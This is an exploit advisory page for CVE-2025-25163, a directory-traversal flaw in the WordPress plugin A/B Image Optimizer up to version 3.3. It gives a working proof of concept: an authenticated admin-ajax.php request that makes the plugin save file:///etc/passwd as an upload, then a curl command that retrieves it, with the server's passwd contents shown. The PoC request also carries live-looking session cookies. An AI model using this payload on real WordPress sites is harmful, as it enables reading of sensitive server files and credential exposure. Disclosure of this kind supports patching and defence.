WordPress Plugin A/B Image Optimizer 3.3 Arbitrary File Download

2025.02.18

Credit: Random

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

CVE-2025-25163
Plugin A/B Image Optimizer <= 3.3 - Authenticated (Subscriber+) Arbitrary File Download

# Description

The Plugin A/B Image Optimizer plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 3.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.

## Details

- **Type**: plugin
- **Slug**: images-optimizer
- **Affected Version**: 3.3
- **CVSS Score**: 6.5
- **CVSS Rating**: Medium
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
- **CVE**: CVE-2025-25163
- **Status**: Closed

POC
---

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal:8929
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Gecko/20100101 Firefox/135.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: wp-settings-1=product_cat_tab%3Dpop%26libraryContent%3Dbrowse; wp-settings-time-1=1739543461; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_f0174336378e6db874da2237e8c05ac1=superadmin%7C1740046038%7C1N8xr9D0vHFOPOWEa8SZgQgnMrADwNBlBuy2clxo5pS%7C1e77f848b7d3c4d32746de6c747e981273be0adb56efe08902946257e29284fe; tk_ai=woo%3AHJ877y%2BjNWutqlxgSuyOlVs2; woocommerce_items_in_cart=1; woocommerce_cart_hash=00dd4812a167442476e6e7ea663fc03e; wp_woocommerce_session_f0174336378e6db874da2237e8c05ac1=1%7C%7C1740046039%7C%7C1740042439%7C%7C81057c84ecef3df59f0857082ef7c538
Priority: u=4
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

action=ab_save_image_locally&imageUrl=file:///etc/passwd
```

```
{"id":5006,"url":"http:\/\/kubernetes.docker.internal:8929\/wp-content\/uploads\/2025\/02\/1739874247.gif"}
```

```
$ curl http://kubernetes.docker.internal:8929/wp-content/uploads/2025/02/1739874247.gif
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
```

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

WordPress Plugin A/B Image Optimizer 3.3 Arbitrary File Download

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

WordPress Plugin A/B Image Optimizer 3.3 Arbitrary File Download

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.